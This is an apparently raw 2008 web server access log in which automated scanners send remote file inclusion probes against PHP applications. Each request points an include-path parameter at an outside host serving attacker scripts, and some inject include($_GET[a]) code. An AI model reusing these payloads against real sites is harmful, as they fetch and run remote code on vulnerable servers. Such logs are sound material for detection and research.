213.215.67.3 - - [19/May/2008:10:22:16 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [19/May/2008:10:22:17 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [19/May/2008:10:22:21 -0700] "GET /logs/access_080226.log//oneadmin/photogallery/include.php?path[docroot]=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [19/May/2008:10:22:21 -0700] "GET /logs/access_080226.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:22:27 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:10:22:39 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:10:22:39 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:22:41 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:22:59 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:23:15 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:23:15 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:23:28 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:23:29 -0700] "GET //includes/db_adodb.php?baseDir=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:23:29 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:23:59 -0700] "GET /logs/access_080218.log/index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:23:59 -0700] "GET /index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:24:00 -0700] "GET /logs/index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:24:01 -0700] "GET /logs/access_080218.log/view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:24:01 -0700] "GET /view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:24:01 -0700] "GET /logs/view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:24:02 -0700] "GET /classes/core/language.php?rootdir=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:24:02 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
74.55.6.34 - - [19/May/2008:10:24:32 -0700] "GET //tools/send_reminders.php?includedir=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:10:24:33 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:10:24:33 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.180 - - [19/May/2008:10:24:40 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
202.60.64.180 - - [19/May/2008:10:24:40 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:24:43 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [19/May/2008:10:24:45 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:24:51 -0700] "GET /logs/access_080218.log/view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:24:51 -0700] "GET /view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:24:51 -0700] "GET /logs/view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [19/May/2008:10:25:12 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [19/May/2008:10:25:12 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.34.67 - - [19/May/2008:10:25:18 -0700] "GET //include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:25:22 -0700] "GET //include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.112.2 - - [19/May/2008:10:26:02 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.205.39 - - [19/May/2008:10:26:06 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.7.205.39 - - [19/May/2008:10:26:09 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:10:26:30 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:10:26:31 -0700] "GET /logs//errors.php?error=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:10:26:31 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:10:26:31 -0700] "GET //errors.php?error=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:10:26:44 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:27:05 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
212.63.130.242 - - [19/May/2008:10:27:14 -0700] "GET //redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
212.63.130.242 - - [19/May/2008:10:27:14 -0700] "GET /logs//redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:10:27:26 -0700] "GET /logs//atom.php5?page=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:10:27:29 -0700] "GET //atom.php5?page=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:27:31 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:27:31 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:27:32 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.1.215.164 - - [19/May/2008:10:27:41 -0700] "GET /logs/access_080109.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:28:02 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:28:02 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.116.103.45 - - [19/May/2008:10:28:13 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.188.60.54 - - [19/May/2008:10:28:16 -0700] "GET //start.php?s=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.116.103.45 - - [19/May/2008:10:28:19 -0700] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:28:30 -0700] "GET /logs/access_080218.log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [19/May/2008:10:28:33 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
99.175.236.97 - - [19/May/2008:10:28:33 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:28:35 -0700] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:28:40 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 200 4140 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:28:41 -0700] "GET /logs/access_080412.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:28:47 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:28:54 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 200 11591 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:29:07 -0700] "GET /logs/access_080412.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
99.175.236.97 - - [19/May/2008:10:29:12 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:29:13 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:29:21 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 200 11591 "-" "libwww-perl/5.53" "www.dmulk.com"
218.38.34.67 - - [19/May/2008:10:29:47 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.67 - - [19/May/2008:10:29:47 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.67 - - [19/May/2008:10:29:48 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:51 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:51 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:52 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:52 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:53 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:53 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:58 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:59 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:59 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:59 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:29:59 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:30:00 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.53.8.217 - - [19/May/2008:10:30:02 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.geocities.com/luna_kinthil/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
141.53.8.217 - - [19/May/2008:10:30:02 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.geocities.com/luna_kinthil/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:30:14 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:30:14 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
78.108.155.178 - - [19/May/2008:10:30:37 -0700] "GET /logs/access.log/index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:30:40 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:30:40 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:30:40 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:30:41 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:30:41 -0700] "GET /modules/My_eGallery/index.php?basepath=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:30:41 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.108.155.178 - - [19/May/2008:10:30:43 -0700] "GET /logs/index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.108.155.178 - - [19/May/2008:10:30:43 -0700] "GET /index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.11.122 - - [19/May/2008:10:30:46 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.11.122 - - [19/May/2008:10:30:46 -0700] "GET /logs//include/lib.inc.php?site_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:30:49 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:30:50 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:30:50 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
99.175.236.97 - - [19/May/2008:10:30:52 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [19/May/2008:10:30:52 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
